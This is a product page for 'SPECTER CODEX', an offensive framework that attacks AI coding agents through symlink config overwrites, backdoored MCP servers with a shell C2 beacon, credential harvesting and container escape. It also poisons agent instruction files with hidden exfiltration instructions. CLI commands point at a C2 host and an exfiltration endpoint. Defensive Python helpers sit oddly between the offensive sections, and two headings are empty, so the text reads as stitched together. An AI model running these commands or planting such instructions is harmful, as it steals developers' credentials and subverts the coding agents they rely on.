T127 — L25 AI DEVELOPER TOOLCHAIN

Red Specter SPECTER CODEX

The AI coding agent exploitation engine. Every developer's trusted AI assistant — Claude Code, Cursor, Copilot, Codex CLI — is a privileged local process with filesystem access. CODEX turns that trust into a kill chain: SymJack RCE, persistent MCP backdoor, credential harvest, container escape.

261 tests · 8 subsystems · 3 CVEs · 5 WMD classes

Why This Exists

AI coding agents are the most privileged software on a developer's machine. They read files, execute commands, clone repos, and load plugins — all with the developer's credentials. The attack surface is enormous and almost entirely unaudited.

SymJack (Adversa AI, May 2026): a symlink in the cloned workspace resolves to the agent's MCP config file when the agent issues a cp command. The config is overwritten with a malicious MCP server definition. On restart, the backdoor loads. Confirmed against Claude Code, Cursor, Copilot CLI, Kiro, Continue.dev, and OpenAI Codex CLI.
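The precondition described above, a workspace symlink whose target lies outside the workspace, can be checked before an agent touches a cloned repository. The following is a minimal audit sketch, not part of CODEX; the function name `find_escaping_symlinks` is hypothetical, and it assumes Python 3.9+ for `Path.is_relative_to`.

```python
import os
from pathlib import Path


def find_escaping_symlinks(workspace):
    """Return (link, target) pairs for symlinks that resolve outside the workspace.

    Hypothetical helper for illustration; it only reads the filesystem.
    """
    root = Path(workspace).resolve()
    escaping = []
    # followlinks=False: symlinked directories are listed but never descended into.
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            entry = Path(dirpath) / name
            if not entry.is_symlink():
                continue
            try:
                target = entry.resolve()  # follows the whole link chain
            except (OSError, RuntimeError):
                # Symlink loops raise on older Python versions; report them as-is.
                escaping.append((entry, entry))
                continue
            if not target.is_relative_to(root):
                escaping.append((entry, target))
    return escaping
```

Any pair this returns is a link that a plain `cp` or write through the link would redirect outside the repository, which is the condition the SymJack description relies on.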

CODEX is the first offensive framework that treats AI coding agents as what they actually are: privileged local processes that can read every secret the developer's own account can read.

CODEX requires authorization. SYMJACK and RULES-INJECT sit behind the INJECT gate. HARVEST, BACKDOOR, and ESCAPE require the UNLEASHED gate plus --confirm-destroy.

CVE Coverage

CVE | Component | CVSS | Vector
SymJack-2026 | All AI coding agents | 9.1 | Symlink in workspace resolves to agent MCP config; overwritten on cp, malicious server loads on restart
CVE-2026-44115 | OpenClaw / coding agent shells | 8.8 | Unquoted heredocs expose env vars; HARVEST uses fallback chain: direct read_file, printenv, /proc/self/environ
CVE-2026-44112 | Agent MCP config reload | 8.4 | TOCTOU race condition in config reload allows secondary persistent config write

Academic Foundation

SymJack (Adversa AI, May 2026): Industry-first disclosure of symlink RCE in AI coding agents. Demonstrated against Claude Code, Cursor, Copilot CLI, Gemini CLI, Grok Build, OpenAI Codex CLI. Requires only repository clone — zero user interaction after cp.

MCP Protocol Threat Model (arXiv:2504.03767): Comprehensive analysis of Model Context Protocol attack surface — server hijack, tool poisoning, privilege escalation via auto-loaded MCP servers.

OWASP MCP Top 10 2026 — MCP-07: Dynamic Server Loading — untrusted repositories can supply malicious MCP server definitions that load automatically on agent startup.

MITRE ATT&CK: T1574.010 (Symlink MCP overwrite), T1552.001 (Credentials in Files), T1547 (Boot/Logon Autostart via MCP), T1611 (Container Escape via Docker socket).

Subsystems

ENUMERATE OPEN

Detect AI coding agents in workspace. Scan config dirs, instruction files, MCP configs. Check MCP enabled status. Calculate attack surface score (0–100). Map SymJack traversal depth per agent.
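The detection step can be approximated by looking for the instruction files that the RULES-INJECT description names. This is a rough sketch only: the marker-to-agent mapping and the name `detect_agents` are assumptions for illustration, and the attack surface score is not reproduced because the source does not define how it is calculated.

```python
from pathlib import Path

# File and directory names come from the RULES-INJECT description;
# the agent labels are an assumed mapping for illustration.
AGENT_MARKERS = {
    "CLAUDE.md": "Claude Code",
    ".cursorrules": "Cursor",
    "copilot-instructions.md": "Copilot",
    ".kiro/steering": "Kiro",
    ".continuerules": "Continue.dev",
    "AGENTS.md": "Codex CLI",
}


def detect_agents(workspace):
    """Map each agent label to the marker paths found under the workspace."""
    root = Path(workspace)
    found = {}
    for marker, agent in AGENT_MARKERS.items():
        # rglob matches the marker at any depth, including the workspace root.
        hits = sorted(p.relative_to(root).as_posix() for p in root.rglob(marker))
        if hits:
            found[agent] = hits
    return found
```

Agents with no marker in the workspace are simply absent from the result, so an empty dict means none of the listed instruction files were found.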

SYMJACK INJECT

Create per-agent symlink RCE payloads in staging directory. Symlink resolves to agent's home MCP config. Malicious config deploys devtools-helper MCP server. Verified resolution via Path.resolve(). C2 callback on agent restart.

RULES-INJECT INJECT

Poison CLAUDE.md, .cursorrules, copilot-instructions.md, .kiro/steering, .continuerules, AGENTS.md with persistent exfil instructions. Unicode zero-width character obfuscation. Idempotent — no double-injection. Survives project reload.
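Zero-width obfuscation of this kind is invisible in most editors but easy to surface programmatically. The sketch below scans text for a handful of zero-width code points. The set `ZERO_WIDTH` and the name `find_zero_width` are illustrative assumptions and are not an exhaustive list of invisible Unicode characters.

```python
# Common zero-width code points; an assumed, non-exhaustive set.
ZERO_WIDTH = {
    "\u200b",  # zero width space
    "\u200c",  # zero width non-joiner
    "\u200d",  # zero width joiner
    "\u2060",  # word joiner
    "\ufeff",  # zero width no-break space / BOM
}


def find_zero_width(text):
    """Return (line, column, code point) for every zero-width character in text.

    Line and column numbers are 1-based.
    """
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in ZERO_WIDTH:
                hits.append((lineno, col, f"U+{ord(ch):04X}"))
    return hits
```

Running it over the contents of an instruction file such as CLAUDE.md or .cursorrules reports where hidden characters sit, which is a reasonable first check before trusting a rules file from a cloned repository.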

HARVEST UNLEASHED + --confirm-destroy

Shannon entropy scan (threshold 3.5) + 15 regex patterns across 16 home credential files and workspace .env files. Anthropic/OpenAI/AWS/GitHub/Google/Stripe/JWT/private key detection. Shell history archaeology. Env var sweep. CVSS scores per credential.
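The entropy test mentioned above is the same one that secret scanners use: a string whose characters are close to uniformly distributed scores high and is more likely to be a key than a word. A minimal sketch of the scoring follows, using the 3.5 threshold from the description. The `min_length` cutoff and both function names are assumptions, and the 15 regex patterns are not reproduced.

```python
import math
from collections import Counter


def shannon_entropy(s):
    """Shannon entropy of s in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def high_entropy_tokens(text, threshold=3.5, min_length=20):
    """Return whitespace-separated tokens that look random.

    threshold matches the value quoted in the description; min_length is an
    assumed cutoff to avoid flagging short ordinary words.
    """
    return [
        tok
        for tok in text.split()
        if len(tok) >= min_length and shannon_entropy(tok) > threshold
    ]
```

For intuition, a string of one repeated character scores 0 bits, while a string of four distinct characters used equally often scores exactly 2 bits per character.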

BACKDOOR UNLEASHED + --confirm-destroy

Plant devtools-helper MCP server (MCP 2024-11-05, stdio JSON-RPC 2.0) into all detected agent configs. Tools: shell_exec (subprocess C2 beacon), read_project_config (credential harvest), persist. TOCTOU secondary config write for race-condition persistence.

ESCAPE UNLEASHED + --confirm-destroy

Detect container runtime (/.dockerenv, cgroups, env vars). Enumerate Docker socket accessibility. Check docker group membership. Scan MCP configs for shell/docker tool grants. Active escape only if socket accessible AND docker tool confirmed in MCP config.
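The detection half of this subsystem rests on a few well-known indicators. The sketch below covers two of them plus the socket check, as read-only tests. The cgroup path `/proc/1/cgroup`, the keyword list, the socket path `/var/run/docker.sock`, and the function names are assumptions, and the `root` parameter exists only so the checks can run against a test directory.

```python
import os
from pathlib import Path


def detect_container(root="/"):
    """Return the list of container indicators found under root."""
    base = Path(root)
    indicators = []
    if (base / ".dockerenv").exists():
        indicators.append("dockerenv")
    try:
        cgroup = (base / "proc/1/cgroup").read_text()
    except OSError:
        cgroup = ""  # unreadable or absent: treat as no evidence
    if any(key in cgroup for key in ("docker", "kubepods", "containerd")):
        indicators.append("cgroup")
    return indicators


def docker_socket_accessible(root="/"):
    """True if the Docker socket path exists and is readable and writable.

    This does not verify that the path is actually a Unix socket.
    """
    sock = Path(root) / "var/run/docker.sock"
    return sock.exists() and os.access(sock, os.R_OK | os.W_OK)
```

A writable Docker socket inside a container is widely treated as equivalent to host access, which is why the description makes socket accessibility one of the two conditions for any active step.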

ENGAGE INJECT

Full automated pipeline: ENUMERATE → SYMJACK → RULES-INJECT → (UNLEASHED) HARVEST → BACKDOOR → ESCAPE. Single command from workspace to full compromise. CDX-signed JSON report.

REPORT OPEN

CDX-{hex12} Ed25519-signed WARLORD-compatible JSON. Vulnerability matrix per agent. MITRE ATT&CK + ATLAS mapping. Remediation roadmap. Mermaid attack flow diagram. Full evidence chain.

CLI Usage

export CODEX_INJECT_TOKEN=$(openssl rand -hex 32)
export CODEX_UNLEASHED_TOKEN=$(openssl rand -hex 32)

# Enumerate coding agents in workspace
specter-codex enumerate --workspace ./target-repo

# Create SymJack payloads (attacker places file, victim runs cp)
specter-codex symjack --session CDX-XXXX --c2-host 10.0.0.1 --c2-port 4444

# Poison instruction files
specter-codex rules-inject --session CDX-XXXX --exfil-endpoint http://c2.example.com/x

# Harvest credentials (UNLEASHED)
specter-codex harvest --session CDX-XXXX --confirm-destroy

# Plant persistent MCP backdoor (UNLEASHED)
specter-codex backdoor --session CDX-XXXX --c2-host 10.0.0.1 --confirm-destroy

# Enumerate container escape paths (UNLEASHED)
specter-codex escape --session CDX-XXXX --confirm-destroy

# Full automated engagement
specter-codex engage --workspace ./target-repo \
  --c2-host 10.0.0.1 --unleashed --confirm-destroy

Agent Coverage

All six major AI coding agents confirmed:

WMD Classes

Differs From Existing Tools

T33 SPECTER MIMIC — injects into IDE rules files to steer model output (what the agent says). CODEX exploits the coding agent as a privileged local process with filesystem access — symlinks, config overwrites, MCP server loading, shell tool abuse. Different attack surface entirely.

T27 LEVIATHAN / T35 VECTOR / T61 ROGUE — attack MCP servers from the client or server side (protocol-level). CODEX plants a new MCP server via filesystem symlink attack, targeting the agent config before it loads.

T88 SPECTER SHADOW — persistent prompt injection via web content. CODEX operates entirely locally — no web request needed. Targets developer machines, not deployed AI services.